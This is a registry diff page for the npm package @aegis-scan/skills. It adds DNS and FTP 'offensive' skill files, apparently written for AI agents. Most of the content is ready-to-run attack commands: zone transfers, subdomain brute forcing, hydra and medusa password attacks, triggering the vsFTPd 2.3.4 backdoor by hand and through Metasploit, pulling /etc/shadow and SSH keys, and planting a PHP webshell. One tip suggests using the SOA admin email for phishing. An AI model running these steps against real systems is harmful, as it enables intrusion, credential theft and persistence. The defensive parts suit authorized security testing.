npm - @aegis-scan/skills - Versions diffs - 0.5.0 → 0.5.2 - Mend

@aegis-scan/skills 0.5.0 → 0.5.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (345) hide show

package/skills/offensive/airecon-fork/protocols-dns/SKILL.md ADDED Viewed

@@ -0,0 +1,203 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: dns
+description: DNS security testing — zone transfer, subdomain enumeration, DNS cache poisoning, DNS tunneling detection, DNSSEC bypass, and DNS-based information disclosure
+---
+# DNS Security Testing
+DNS = domain to IP translation. Attack surface: zone transfer (full record dump), subdomain brute force, DNS cache poisoning, DNS tunneling (exfil), and misconfigured resolvers.
+**Install:**
+```
+sudo apt-get install -y dnsutils bind9-dnsutils fierce dnsenum dnsrecon
+go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
+go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
+pip install dnsgen --break-system-packages
+sudo apt-get install -y amass
+```
+**Port:** 53/UDP (queries), 53/TCP (zone transfer)
+---
+## Reconnaissance
+    nmap -p 53 <target> -sU --open -sV
+    nmap -p 53 <target> -sV                # TCP DNS (zone transfer port)
+    nmap -p 53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=target.com <target>
+    # Find name servers for domain:
+    dig NS target.com
+    dig NS target.com +short
+    # Find mail servers:
+    dig MX target.com +short
+---
+## Zone Transfer (AXFR)
+Zone transfer leaks ALL DNS records — every hostname, IP, MX, TXT:
+    # Direct zone transfer:
+    dig axfr target.com @ns1.target.com
+    dig axfr target.com @<nameserver_ip>
+    # Try all nameservers:
+    for ns in $(dig NS target.com +short); do
+        echo "=== Trying $ns ===";
+        dig axfr target.com @$ns;
+    done
+    # host command:
+    host -t axfr target.com ns1.target.com
+    # dnsrecon:
+    dnsrecon -d target.com -t axfr
+---
+## Subdomain Enumeration
+### Passive (no DNS queries to target)
+    # subfinder — multi-source passive:
+    subfinder -d target.com -o output/subdomains_passive.txt
+    subfinder -d target.com -all -recursive -o output/subdomains_full.txt
+    # amass passive:
+    amass enum -passive -d target.com -o output/amass_passive.txt
+    # Certificate transparency:
+    curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
+### Active Brute Force
+    # fierce:
+    fierce --domain target.com --wordlist /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt
+    # dnsenum:
+    dnsenum target.com
+    dnsenum --dnsserver <ns_ip> --enum -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt target.com
+    # dnsrecon:
+    dnsrecon -d target.com -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
+    # dnsx — fast resolver + brute:
+    cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | \
+      dnsx -d target.com -o output/dnsx_subs.txt
+### DNS Permutation/Alteration
+    # dnsgen — generate permutations of known subdomains:
+    cat output/subdomains.txt | dnsgen - | dnsx -silent > output/permutations.txt
+---
+## DNS Record Enumeration
+    # All common record types:
+    dig target.com A                 # IPv4 address
+    dig target.com AAAA              # IPv6
+    dig target.com MX                # Mail servers
+    dig target.com TXT               # Text records (SPF, DKIM, verification tokens)
+    dig target.com NS                # Name servers
+    dig target.com SOA               # Start of Authority (serial, refresh, admin email)
+    dig target.com CNAME             # Aliases
+    dig target.com SRV               # Service locator (useful for internal services)
+    dig target.com PTR               # Reverse DNS
+    # TXT records often contain:
+    # SPF: v=spf1 include:mailprovider.com ...
+    # DKIM: v=DKIM1; k=rsa; p=<key>
+    # Verification: google-site-verification=...
+    # Admin contact email embedded in SOA record
+    # Reverse DNS (IP → hostname):
+    dig -x 1.2.3.4
+    dig -x 1.2.3.4 +short
+    # Internal DNS — try internal resolver:
+    dig @<internal_dns_ip> internal.corp
+    dig @<internal_dns_ip> AXFR corp.local   # Internal zone transfer
+---
+## DNS Cache Poisoning Detection
+    # Check if resolver accepts forged responses:
+    nmap -sU -p 53 --script dns-recursion <target>
+    # Recursion allowed = can be used as open resolver (DoS amplification)
+    # Check for DNSSEC:
+    dig +dnssec target.com
+    # Look for: AD flag (authenticated data) in response
+---
+## DNS Tunneling Detection
+DNS tunneling = exfiltrating data via DNS queries (common C2 channel):
+    # Signs of DNS tunneling in PCAP:
+    tshark -r capture.pcap -Y "dns" -T fields -e dns.qry.name | \
+      awk '{print length, $0}' | sort -rn | head -20
+    # Long subdomains (>50 chars) = likely encoded data
+    # High-entropy labels = base64/hex encoded
+    # Detect via query frequency:
+    tshark -r capture.pcap -Y "dns" -T fields -e dns.qry.name | \
+      sed 's/[^.]*\.\(.*\)/\1/' | sort | uniq -c | sort -rn
+    # One domain getting 1000s of queries = tunneling
+    # iodine — DNS tunnel tool (for testing):
+    # sudo apt-get install -y iodine
+    # Server: iodined -f -c -P password 10.0.0.1 tunnel.target.com
+    # Client: iodine -f -P password tunnel.target.com
+---
+## SPF / DMARC Analysis
+    # Check email security posture:
+    dig TXT target.com | grep spf
+    # Weak SPF: "v=spf1 +all" = anyone can send mail as target.com!
+    # Missing DMARC:
+    dig TXT _dmarc.target.com
+    # p=none = no enforcement (emails will be delivered even if forged)
+---
+## DNS Amplification (DDoS Vector)
+    # Check if resolver is open (accepts queries from any source):
+    dig @<target_dns> ANY isc.org
+    # Large response = amplification possible
+    # DO NOT EXPLOIT without authorization
+---
+## Wildcard DNS Detection
+    # Wildcard = *.target.com resolves to some IP (causes false positives in brute force):
+    dig random-nonexistent-sub123456.target.com
+    # If it resolves → wildcard enabled → filter brute force results
+---
+## Pro Tips
+1. Zone transfer succeeds on ~15% of real targets — always try all NS servers
+2. `subfinder -all` uses 20+ passive sources — run before any active DNS brute force
+3. SOA record contains admin email — use for social engineering or phishing
+4. TXT records reveal tech stack: SPF shows email providers, v= shows marketing tools
+5. Wildcard DNS breaks subdomain brute force — detect with random subdomain query first
+6. Internal DNS servers often allow zone transfer from any IP — test from inside the network
+7. dnsgen permutations find dev/staging/test subdomains not in wordlists
+## Summary
+DNS testing: `dig AXFR` on all NS servers → `subfinder -all` passive → `dnsrecon -t brt` brute force → `dnsgen` permutations → record analysis (TXT for SPF/DKIM, SOA for admin email, SRV for internal services). Zone transfer = full infrastructure map in one command. Always check for wildcard before brute force.

package/skills/offensive/airecon-fork/protocols-ftp/SKILL.md ADDED Viewed

@@ -0,0 +1,159 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: ftp
+description: FTP security testing — anonymous login, brute force, bounce attacks, FTPS misconfiguration, vsftpd backdoor CVE, and sensitive file extraction
+---
+# FTP Security Testing
+FTP (File Transfer Protocol) — cleartext authentication, common anonymous access. Attack surface: anonymous login, credential brute force, vsftpd backdoor (CVE-2011-2523), misconfigured write access.
+**Ports:** 21 (FTP control), 20 (FTP data), 990 (FTPS)
+---
+## Reconnaissance
+    nmap -p 21 <target> -sV --open
+    nmap -p 21 <target> --script ftp-anon,ftp-banner,ftp-syst,ftp-brute
+    # Banner grab:
+    nc <target> 21
+    # 220 (vsFTPd 2.3.4) ← BACKDOOR! CVE-2011-2523
+---
+## Anonymous Login
+    # Test anonymous:
+    ftp <target>
+    Name: anonymous
+    Password: anonymous@domain.com   # or any email
+    # Command line:
+    ftp -n <target> << EOF
+    quote USER anonymous
+    quote PASS anonymous@
+    ls -la
+    get sensitive_file.txt
+    bye
+    EOF
+    # curl:
+    curl ftp://<target>/                          # List root
+    curl ftp://<target>/ --user "anonymous:"      # Explicit anonymous
+    curl ftp://<target>/etc/passwd --user "anonymous:"  # Try to read files
+    # nmap script:
+    nmap --script ftp-anon -p 21 <target>
+---
+## Interactive FTP Commands
+    ftp <target>
+    > ls -la              # List all files (including hidden)
+    > pwd                 # Current directory
+    > cd /etc             # Change directory
+    > get passwd          # Download file
+    > put shell.php       # Upload file (if write access)
+    > mget *              # Download all files
+    > binary              # Switch to binary mode for binary files
+    > passive             # Toggle passive mode
+    > bye                 # Exit
+---
+## Brute Force
+    # hydra:
+    hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://<target>
+    hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
+          -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
+          ftp://<target> -t 4
+    # medusa:
+    medusa -h <target> -u admin -P /usr/share/wordlists/rockyou.txt -M ftp
+    # nmap:
+    nmap --script ftp-brute -p 21 <target>
+---
+## CVE-2011-2523 — vsFTPd 2.3.4 Backdoor
+Smiley face ":)" in username triggers backdoor shell on port 6200:
+    # Detect: banner shows "vsFTPd 2.3.4"
+    nmap -p 21 -sV <target>
+    # Manually trigger backdoor:
+    ftp <target>
+    User: backdoored:)
+    Pass: anything
+    # Then connect to port 6200:
+    nc <target> 6200
+    # Metasploit:
+    use exploit/unix/ftp/vsftpd_234_backdoor
+    set RHOSTS <target>
+    run
+---
+## File Extraction (If Credentials Obtained)
+    # Recursive download with wget:
+    wget -r --no-passive ftp://user:password@<target>/
+    # lftp (powerful FTP client):
+    sudo apt-get install -y lftp
+    lftp -u user,password ftp://<target>
+    lftp> mirror --verbose /remote/dir /local/dir/   # Recursive download
+    # Sensitive files to look for:
+    get /etc/passwd
+    get /etc/shadow
+    get /home/<user>/.ssh/id_rsa
+    get /var/www/html/config.php
+    get /backup/*.sql
+---
+## FTP Write Access → Webshell
+If FTP write access and FTP root = webroot:
+    # Upload webshell:
+    ftp <target>
+    > put shell.php
+    > ls -la shell.php
+    # Access: http://<target>/shell.php?cmd=id
+---
+## FTPS / SFTP Notes
+    # FTPS (FTP over TLS) — port 990 or explicit FTPS on 21:
+    curl ftps://<target>/ --user "user:pass" -k  # -k ignores cert errors
+    # Check TLS cert:
+    openssl s_client -connect <target>:21 -starttls ftp
+    # SFTP (SSH-based, completely different protocol):
+    sftp user@<target>     # Uses SSH port 22, NOT FTP
+---
+## Pro Tips
+1. Anonymous access is still common on older servers, IoT devices, and misconfigured cloud
+2. vsFTPd 2.3.4 backdoor is instant RCE — always check banner
+3. FTP credentials in cleartext: `wireshark` or `tshark -f 'port 21'` captures them on LAN
+4. Write access to FTP root = webshell if web server serves the same directory
+5. `wget -r` recursively downloads entire FTP site in one command
+6. PASV mode required for NAT'd connections — try `passive` in ftp client if connection hangs
+## Summary
+FTP testing: `nmap --script ftp-anon` → try `anonymous:anonymous` → check banner for vsFTPd 2.3.4 (backdoor) → brute force with hydra → if access: `wget -r` for full recursive download → if write: upload webshell. Cleartext protocol — capture creds on LAN with tshark.